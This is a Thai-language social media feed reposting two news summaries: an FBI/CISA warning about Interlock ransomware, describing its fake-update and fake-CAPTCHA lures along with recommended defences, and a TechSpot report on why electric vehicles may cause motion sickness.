    🎙️ เรื่องเล่าจากมัลแวร์ที่ปลอมตัวเป็น Chrome: เมื่อ Interlock แรนซัมแวร์ใช้ CAPTCHA หลอกให้รันคำสั่งเอง Interlock ถูกตรวจพบครั้งแรกในเดือนกันยายน 2024 และมีการโจมตีเพิ่มขึ้นในช่วงกลางปี 2025 โดย FBI พบว่า: - กลุ่มนี้พัฒนาแรนซัมแวร์สำหรับทั้ง Windows และ Linux - เน้นโจมตีระบบ virtual machine (VM) และใช้เทคนิคใหม่ในการเข้าถึงระบบ เทคนิคที่ใช้มีความแปลกใหม่ เช่น: - “Drive-by download” จากเว็บไซต์ที่ถูกแฮก โดยปลอมเป็นอัปเดตของ Chrome, Edge, FortiClient หรือ Cisco Secure Client - “ClickFix” — หลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วคัดลอกคำสั่งไปวางในหน้าต่าง Run ของระบบ เมื่อเข้าระบบได้แล้ว Interlock จะ: - ใช้ web shell และ Cobalt Strike เพื่อควบคุมระบบ - ขโมยข้อมูล เช่น username, password และใช้ keylogger บันทึกการพิมพ์ - เข้ารหัสไฟล์และเปลี่ยนนามสกุลเป็น .interlock หรือ .1nt3rlock - ส่งโน้ตร้องขอค่าไถ่ผ่านเว็บไซต์ .onion โดยไม่ระบุจำนวนเงิน - ข่มขู่ว่าจะเปิดเผยข้อมูลหากไม่จ่ายค่าไถ่เป็น Bitcoin — และเคยทำจริงหลายครั้ง FBI, CISA, HHS และ MS-ISAC แนะนำให้ทุกองค์กรเร่งดำเนินมาตรการป้องกัน เช่น: - ใช้ DNS filtering และ firewall เพื่อป้องกันการเข้าถึงเว็บอันตราย - อัปเดตระบบและซอฟต์แวร์ทั้งหมด - ใช้ MFA และจัดการสิทธิ์การเข้าถึงอย่างเข้มงวด - แบ่งเครือข่ายเพื่อลดการแพร่กระจาย - สำรองข้อมูลแบบ offline และไม่สามารถแก้ไขได้ (immutable backup) ✅ FBI และ CISA เตือนภัย Interlock ransomware ที่โจมตีองค์กรและโครงสร้างพื้นฐานสำคัญ ➡️ ใช้เทคนิค double extortion คือทั้งเข้ารหัสและข่มขู่เปิดเผยข้อมูล ✅ Interlock พัฒนาแรนซัมแวร์สำหรับ Windows และ Linux โดยเน้นโจมตี VM ➡️ ใช้เทคนิคใหม่ เช่น drive-by download และ ClickFix ✅ ClickFix คือการหลอกให้ผู้ใช้คลิก CAPTCHA ปลอม แล้วรันคำสั่งอันตรายเอง ➡️ เป็นการใช้ social engineering ที่แยบยลและยากต่อการตรวจจับ ✅ หลังเข้าระบบ Interlock ใช้ Cobalt Strike และ web shell เพื่อควบคุมและขโมยข้อมูล ➡️ รวมถึงการใช้ keylogger เพื่อดักจับการพิมพ์ ✅ ไฟล์ที่ถูกเข้ารหัสจะมีนามสกุล .interlock หรือ .1nt3rlock ➡️ โน้ตร้องขอค่าไถ่ไม่ระบุจำนวนเงิน แต่ให้ติดต่อผ่าน Tor ✅ หน่วยงานแนะนำให้ใช้ DNS filtering, MFA, network segmentation และ backup แบบ immutable ➡️ พร้อมทรัพยากรฟรีจากโครงการ #StopRansomware https://hackread.com/fbi-cisa-interlock-ransomware-target-critical-infrastructure/
    HACKREAD.COM
    FBI and CISA Warn of Interlock Ransomware Targeting Critical Infrastructure
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 207 มุมมอง 0 รีวิว
  • เรื่องเล่าจากรถเงียบที่ทำให้คนเวียนหัว: เมื่อ EV กลายเป็น “สภาพแวดล้อมใหม่” ที่สมองยังไม่ชิน

    ผู้โดยสารจำนวนมากรายงานว่าเกิดอาการเมารถเมื่อขึ้น EV โดยเฉพาะในเบาะหลัง ซึ่งนักวิจัยเชื่อว่าเกิดจากหลายปัจจัย เช่น:

    - สมองยังไม่คุ้นเคยกับ “สัญญาณการเคลื่อนไหว” แบบใหม่
    - EV ไม่มีเสียงเครื่องยนต์หรือแรงสั่นสะเทือนที่ช่วยเตือนสมองล่วงหน้า
    - ระบบ regenerative braking ทำให้การชะลอรถเป็นแบบนุ่มนวลและต่อเนื่อง ซึ่งต่างจากเบรกแบบเดิมที่หยุดรถอย่างฉับพลัน

    William Emond นักศึกษาปริญญาเอกด้าน motion sickness จากฝรั่งเศสอธิบายว่า:

    “สมองของเราคุ้นเคยกับการเคลื่อนไหวในรถที่มีเสียงเครื่องยนต์และแรงสั่นสะเทือน แต่ EV เป็นสภาพแวดล้อมใหม่ที่สมองยังไม่มีประสบการณ์มากพอในการประเมินแรงเคลื่อน”

    งานวิจัยหลายฉบับสนับสนุนแนวคิดนี้ เช่น:
    - งานปี 2024 พบว่าแรงสั่นสะเทือนในเบาะของ EV มีผลต่อความรุนแรงของอาการเมารถ
    - งานปี 2020 ชี้ว่า “ความเงียบ” ของ EV เป็นปัจจัยสำคัญที่ทำให้สมองขาดข้อมูลในการคาดการณ์การเคลื่อนไหว

    นักวิจัยกำลังทดลองวิธีแก้ เช่น:
    - เพิ่มเสียงเครื่องยนต์จำลอง
    - ใช้แสงภายในรถแบบ interactive
    - เพิ่มแรงสั่นสะเทือนบางจุดเพื่อให้สมองรับรู้การเคลื่อนไหวได้ดีขึ้น

    ผู้โดยสารจำนวนมากรายงานว่าเกิดอาการเมารถเมื่อโดยสาร EV โดยเฉพาะในเบาะหลัง
    เกิดจากสมองไม่สามารถคาดการณ์การเคลื่อนไหวได้แม่นยำ

    EV ไม่มีเสียงเครื่องยนต์หรือแรงสั่นสะเทือนที่ช่วยเตือนสมองล่วงหน้า
    ทำให้สมอง “เดา” การเปลี่ยนความเร็วหรือทิศทางผิดพลาด

    ระบบ regenerative braking ทำให้การชะลอรถเป็นแบบนุ่มนวลและต่อเนื่อง
    ต่างจากเบรกแบบเดิมที่หยุดรถอย่างฉับพลัน ซึ่งสมองคุ้นเคยมากกว่า

    งานวิจัยปี 2024 และ 2020 สนับสนุนว่าแรงสั่นสะเทือนและความเงียบของ EV เป็นปัจจัยหลัก
    ส่งผลให้เกิดอาการเมารถมากกว่ารถยนต์ทั่วไป

    นักวิจัยกำลังทดลองวิธีแก้ เช่นเสียงเครื่องยนต์จำลอง, แสง interactive, และแรงสั่นสะเทือน
    เพื่อช่วยให้สมองรับรู้การเคลื่อนไหวได้แม่นยำขึ้น

    อาการเมารถเกิดจากความขัดแย้งของสัญญาณจากตา, หูชั้นใน, และร่างกาย
    เมื่อสมองรับข้อมูลไม่ตรงกัน จะเกิดอาการคลื่นไส้ เวียนหัว และไม่สบาย

    https://www.techspot.com/news/108757-evs-triggering-wave-motion-sickness-claims-scientists-investigating.html
    🎙️ เรื่องเล่าจากรถเงียบที่ทำให้คนเวียนหัว: เมื่อ EV กลายเป็น “สภาพแวดล้อมใหม่” ที่สมองยังไม่ชิน ผู้โดยสารจำนวนมากรายงานว่าเกิดอาการเมารถเมื่อขึ้น EV โดยเฉพาะในเบาะหลัง ซึ่งนักวิจัยเชื่อว่าเกิดจากหลายปัจจัย เช่น: - สมองยังไม่คุ้นเคยกับ “สัญญาณการเคลื่อนไหว” แบบใหม่ - EV ไม่มีเสียงเครื่องยนต์หรือแรงสั่นสะเทือนที่ช่วยเตือนสมองล่วงหน้า - ระบบ regenerative braking ทำให้การชะลอรถเป็นแบบนุ่มนวลและต่อเนื่อง ซึ่งต่างจากเบรกแบบเดิมที่หยุดรถอย่างฉับพลัน William Emond นักศึกษาปริญญาเอกด้าน motion sickness จากฝรั่งเศสอธิบายว่า: 🔖 “สมองของเราคุ้นเคยกับการเคลื่อนไหวในรถที่มีเสียงเครื่องยนต์และแรงสั่นสะเทือน แต่ EV เป็นสภาพแวดล้อมใหม่ที่สมองยังไม่มีประสบการณ์มากพอในการประเมินแรงเคลื่อน” งานวิจัยหลายฉบับสนับสนุนแนวคิดนี้ เช่น: - งานปี 2024 พบว่าแรงสั่นสะเทือนในเบาะของ EV มีผลต่อความรุนแรงของอาการเมารถ - งานปี 2020 ชี้ว่า “ความเงียบ” ของ EV เป็นปัจจัยสำคัญที่ทำให้สมองขาดข้อมูลในการคาดการณ์การเคลื่อนไหว นักวิจัยกำลังทดลองวิธีแก้ เช่น: - เพิ่มเสียงเครื่องยนต์จำลอง - ใช้แสงภายในรถแบบ interactive - เพิ่มแรงสั่นสะเทือนบางจุดเพื่อให้สมองรับรู้การเคลื่อนไหวได้ดีขึ้น ✅ ผู้โดยสารจำนวนมากรายงานว่าเกิดอาการเมารถเมื่อโดยสาร EV โดยเฉพาะในเบาะหลัง ➡️ เกิดจากสมองไม่สามารถคาดการณ์การเคลื่อนไหวได้แม่นยำ ✅ EV ไม่มีเสียงเครื่องยนต์หรือแรงสั่นสะเทือนที่ช่วยเตือนสมองล่วงหน้า ➡️ ทำให้สมอง “เดา” การเปลี่ยนความเร็วหรือทิศทางผิดพลาด ✅ ระบบ regenerative braking ทำให้การชะลอรถเป็นแบบนุ่มนวลและต่อเนื่อง ➡️ ต่างจากเบรกแบบเดิมที่หยุดรถอย่างฉับพลัน ซึ่งสมองคุ้นเคยมากกว่า ✅ งานวิจัยปี 2024 และ 2020 สนับสนุนว่าแรงสั่นสะเทือนและความเงียบของ EV เป็นปัจจัยหลัก ➡️ ส่งผลให้เกิดอาการเมารถมากกว่ารถยนต์ทั่วไป ✅ นักวิจัยกำลังทดลองวิธีแก้ เช่นเสียงเครื่องยนต์จำลอง, แสง interactive, และแรงสั่นสะเทือน ➡️ เพื่อช่วยให้สมองรับรู้การเคลื่อนไหวได้แม่นยำขึ้น ✅ อาการเมารถเกิดจากความขัดแย้งของสัญญาณจากตา, หูชั้นใน, และร่างกาย ➡️ เมื่อสมองรับข้อมูลไม่ตรงกัน จะเกิดอาการคลื่นไส้ เวียนหัว และไม่สบาย https://www.techspot.com/news/108757-evs-triggering-wave-motion-sickness-claims-scientists-investigating.html
    WWW.TECHSPOT.COM
    EVs are triggering a wave of motion sickness claims, scientists are investigating why
    Because electric vehicles are still a new experience for many passengers, their unfamiliar motion may be one reason some people are more prone to motion sickness. "Greater...
    0 ความคิดเห็น 0 การแบ่งปัน 155 มุมมอง 0 รีวิว
Pages Boosts